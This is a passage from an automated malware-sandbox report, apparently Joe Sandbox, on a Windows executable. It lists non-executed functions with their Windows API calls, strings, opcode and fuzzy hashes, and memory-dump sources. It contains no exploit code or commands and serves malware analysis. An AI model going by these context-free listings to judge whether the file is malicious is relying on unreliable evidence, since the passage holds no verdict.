                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 98029f8225bb403c064ae2a2f5586b174b8679b9686b2f857da0c52b1feeae08
                                                                                              • Instruction ID: c482cb53af8691cd930b1d243cd5ad8b736026e47d27f7880fda3e3f0d1f2015
                                                                                              • Opcode Fuzzy Hash: 98029f8225bb403c064ae2a2f5586b174b8679b9686b2f857da0c52b1feeae08
                                                                                              • Instruction Fuzzy Hash: 6CF0E270D85B018AD7309A24E844362BAE46B21379F446B0ED0E65A5E4C372A889CA50

                                                                                              Non-executed Functions

                                                                                              Function 00E69B5C Relevance: 23.3, APIs: 9, Strings: 4, Instructions: 577fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00E69CB1
                                                                                                • Part of subcall function 00E6AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E6AC2E
                                                                                                • Part of subcall function 00E6AC11: GetLastError.KERNEL32 ref: 00E6AC72
                                                                                                • Part of subcall function 00E6AC11: CloseHandle.KERNEL32(?), ref: 00E6AC81
                                                                                                • Part of subcall function 00E62F45: _wcslen.LIBCMT ref: 00E62F50
                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00E69EE1
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E69F1E
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00E6A0BF
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00E6A127
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A134
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A14A
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A18E
                                                                                              • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A196
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3517300771-3508440684
                                                                                              • Opcode ID: 83ea44f48e3b436e55360d95a0e0b87cd686ff188eca164e8efee942a3264787
                                                                                              • Instruction ID: f917c64ba1901f62c71fb49e8aaf6c6299d508a40734caf1449ef48bd26969d1
                                                                                              • Opcode Fuzzy Hash: 83ea44f48e3b436e55360d95a0e0b87cd686ff188eca164e8efee942a3264787
                                                                                              • Instruction Fuzzy Hash: 0332A4719402889FDF24DFA4EC81BEE77F8AF15354F14516AE849F7282DB349A08CB61
                                                                                              Function 00E81630 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 275windowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E8163A
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E816BB
                                                                                              • EndDialog.USER32(?,00000006), ref: 00E816CE
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00E816EA
                                                                                              • SetFocus.USER32(00000000), ref: 00E816F1
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                                • Part of subcall function 00E61DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00E61DFC
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E81763
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E81783
                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00E81826
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E818AD
                                                                                                • Part of subcall function 00E61150: _wcslen.LIBCMT ref: 00E6115B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                                                              • String ID: %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 485132379-439456425
                                                                                              • Opcode ID: 8d2a24686ccf73bb73c532550ff647b6c4ab24340a046e90e39299cce9a8036c
                                                                                              • Instruction ID: 15b1cc7eca347a66db9dff2d0d0e23811d585274fbbc645e41a2a91494d02ae0
                                                                                              • Opcode Fuzzy Hash: 8d2a24686ccf73bb73c532550ff647b6c4ab24340a046e90e39299cce9a8036c
                                                                                              • Instruction Fuzzy Hash: 1FA1AE71944218BAEB22FBA0DC4AFEEB7BCAF05340F0451D9B24DB3182DA715F458B61
                                                                                              Function 00E9480E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: c07f02e5c64b20bbd849e99c1d1cd05662620edf5736608792b839fa1114102c
                                                                                              • Instruction ID: 38f8abd02288aee453f0775ead5aebf263c372304cd747f4bd8d281b5a96e660
                                                                                              • Opcode Fuzzy Hash: c07f02e5c64b20bbd849e99c1d1cd05662620edf5736608792b839fa1114102c
                                                                                              • Instruction Fuzzy Hash: 4AC228B2E056298FDF25CE289D40BEAB3B5EB45305F1551EAD84DF7280E774AE818F40
                                                                                              Function 00E84E14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,YM,0000001C,00E84F4E,00000000,?,?,?,?,?,?,?,00E84D59,00000004,00EB5D84,00E84FDE), ref: 00E84E25
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E84D59,00000004,00EB5D84,00E84FDE), ref: 00E84E40
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D$YM
                                                                                              • API String ID: 401686933-2572881589
                                                                                              • Opcode ID: 9fac96bcdec14cba7393daaf287420485880c10c68697c5bb2103a83c23206b9
                                                                                              • Instruction ID: 3ae76469131678e08edecd1223ba05722abc8a87213ec80ed7ba6c7d1a695cc1
                                                                                              • Opcode Fuzzy Hash: 9fac96bcdec14cba7393daaf287420485880c10c68697c5bb2103a83c23206b9
                                                                                              • Instruction Fuzzy Hash: B201F7726001096BCB14EE29CC05BEE7BA9EFC4328F0CC125ED5DEB294DB34D9058790
                                                                                              Function 00E63D9D Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strlen.LIBCMT ref: 00E6438C
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E64523
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 2172594012-2756464174
                                                                                              • Opcode ID: ec564fab30a87ad43b03aea5517efe9f471c81173862ff88abcbea62c736830d
                                                                                              • Instruction ID: b4c6fc58e923bc55422108a11fb6518fc137ac4ca418c9392103b10961cbb400
                                                                                              • Opcode Fuzzy Hash: ec564fab30a87ad43b03aea5517efe9f471c81173862ff88abcbea62c736830d
                                                                                              • Instruction Fuzzy Hash: 3072E1B1A403448FCB18DF78D8917EA7BE1EF15344F08557EEC5AAB282DB70A944CB61
                                                                                              Function 00E86878 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E86884
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00E86950
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E86970
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00E8697A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 36d68e051c5a64a2af397426420ca4b28c8c0d7c304470a16907d3c5570bed95
                                                                                              • Instruction ID: ceffa110f76982b92a9d5b46f2c3f2332843ab76abcfe7da7da695b3fba012ed
                                                                                              • Opcode Fuzzy Hash: 36d68e051c5a64a2af397426420ca4b28c8c0d7c304470a16907d3c5570bed95
                                                                                              • Instruction Fuzzy Hash: 64311875D463189BDB11EFA5D989BCCBBF8AF08304F1050EAE44CAB250EB719A84CF44
                                                                                              Function 00E6932C Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E6952D,?,00000040,00E6931E,00000001,?,?,?,?,0000001C,00E77618,00EAE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00E69330
                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00E6952D,?,00000040,00E6931E,00000001,?,?), ref: 00E69351
                                                                                              • _wcslen.LIBCMT ref: 00E69360
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00EAE0C8,?,?,00E6952D,?,00000040,00E6931E,00000001,?,?,?,?,0000001C), ref: 00E69373
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 991192900-0
                                                                                              • Opcode ID: 1659e23b3cd7bc2cec8bee4dc1bb0ccd76146f3c04b5ff7123633d1865be96e6
                                                                                              • Instruction ID: 83192a02ab086f9ce932b214d90e91b334d1248ed9c2220534d630b52e3c53c6
                                                                                              • Opcode Fuzzy Hash: 1659e23b3cd7bc2cec8bee4dc1bb0ccd76146f3c04b5ff7123633d1865be96e6
                                                                                              • Instruction Fuzzy Hash: 80F082B5680204FFEB05EBA1ED05EFF77ADAB85780B24905AF502B6191CA709E01D678
                                                                                              Function 00E8AAC4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00E8535E), ref: 00E8ABBC
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00E8535E), ref: 00E8ABC6
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00E8535E), ref: 00E8ABD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 7d8281aaa50b9acc6f8606367abca1acc7bdad182172e60631d888ce97511703
                                                                                              • Instruction ID: d628847299c28972ace28592474932bcecf6e3656f7b81542e597df1e2a0c340
                                                                                              • Opcode Fuzzy Hash: 7d8281aaa50b9acc6f8606367abca1acc7bdad182172e60631d888ce97511703
                                                                                              • Instruction Fuzzy Hash: EF31D4759012289BCB21EF65D988BDCBBB8BF08310F5051EAE41CA7261EB349F858F45
                                                                                              Function 00E91FF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              • Opcode ID: cfdcdebac96b2dc9bc8a84fde04c809fe1673c3b00a60a28ba578813cf50a053
                                                                                              • Instruction ID: 5b43bbecf344f96377ff2bb8a6a8c06031b3173669ef34f6c7090db72f791f12
                                                                                              • Opcode Fuzzy Hash: cfdcdebac96b2dc9bc8a84fde04c809fe1673c3b00a60a28ba578813cf50a053
                                                                                              • Instruction Fuzzy Hash: C531F2729002097FDF249E79CC84EEB7BADDB85318F1411ADFA18A7251E6319D45CB50
                                                                                              Function 00E94360 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                              • Instruction ID: c183c44feed36fc38137a61e0dfab1327439b36b46cc3dfb5a692d84f2891bed
                                                                                              • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                              • Instruction Fuzzy Hash: A1023DB1E002199BDF14CFA9D880AADB7F1EF89314F25526AD919F7385D730AD42CB90
                                                                                              Function 00E7FD34 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E7FD6A
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00EA9714,?,?), ref: 00E7FDB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: 852d9ed98e5d9ba2169e5f432855a7eee17e8fe7875e38233ac9a75a08c917ed
                                                                                              • Instruction ID: 8f5bfc68206c35cd74798081eb63e0f3e1c8dd011fdd867f9b9f3e1c547f0249
                                                                                              • Opcode Fuzzy Hash: 852d9ed98e5d9ba2169e5f432855a7eee17e8fe7875e38233ac9a75a08c917ed
                                                                                              • Instruction Fuzzy Hash: C8113C75221348AFDB10EF65DC41BEB77F8EF48704F10546AF505B7161D670A908C768
                                                                                              Function 00E648AA Relevance: 2.0, Strings: 1, Instructions: 776COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CMT
                                                                                              • API String ID: 0-2756464174
                                                                                              • Opcode ID: a35986242c71f3e7d92df37155a37372466f218006e51cca83dcb1b70667ace3
                                                                                              • Instruction ID: 05a4dcca13baa76ecf7cbc58100c2b86da9c80a5f87f5403f67ec4327f5d2824
                                                                                              • Opcode Fuzzy Hash: a35986242c71f3e7d92df37155a37372466f218006e51cca83dcb1b70667ace3
                                                                                              • Instruction Fuzzy Hash: 8E62E3B2A406499FDF08DF74D891BDD7BE4BF15344F08A029EC09AB286DB309944CBA1
                                                                                              Function 00E986D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E986CD,?,?,00000008,?,?,00E9836D,00000000), ref: 00E988FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: e0b2b52f6f0d6925bde860243ff7f4d116e7568a38c6937268224c91fa136855
                                                                                              • Instruction ID: 61e3bf72203031dcedf597563cbbf1c24c8eaa7d816b5a862c7466c473193294
                                                                                              • Opcode Fuzzy Hash: e0b2b52f6f0d6925bde860243ff7f4d116e7568a38c6937268224c91fa136855
                                                                                              • Instruction Fuzzy Hash: 38B18D31510608DFDB18CF28C58ABA47BE0FF46368F659659E89ADF2B1C735D982CB40
                                                                                              Function 00E86694 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E866AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: d319dc649a79c7980279df3e10fe75a9efca85d78a51d26b844e932e579312a8
                                                                                              • Instruction ID: 2d12fc4ca4f8dd85e39a368780d79c5ad685e1783e1cd7e039600c24c5508a86
                                                                                              • Opcode Fuzzy Hash: d319dc649a79c7980279df3e10fe75a9efca85d78a51d26b844e932e579312a8
                                                                                              • Instruction Fuzzy Hash: 5351A072911205CFDF18CF9AE8857AABBF0FB48318F24856AE40DFB251D3759944CB50
                                                                                              Function 00E703BE Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00E703ED
                                                                                                • Part of subcall function 00E70469: __EH_prolog3.LIBCMT ref: 00E70470
                                                                                              Memory Dump Source
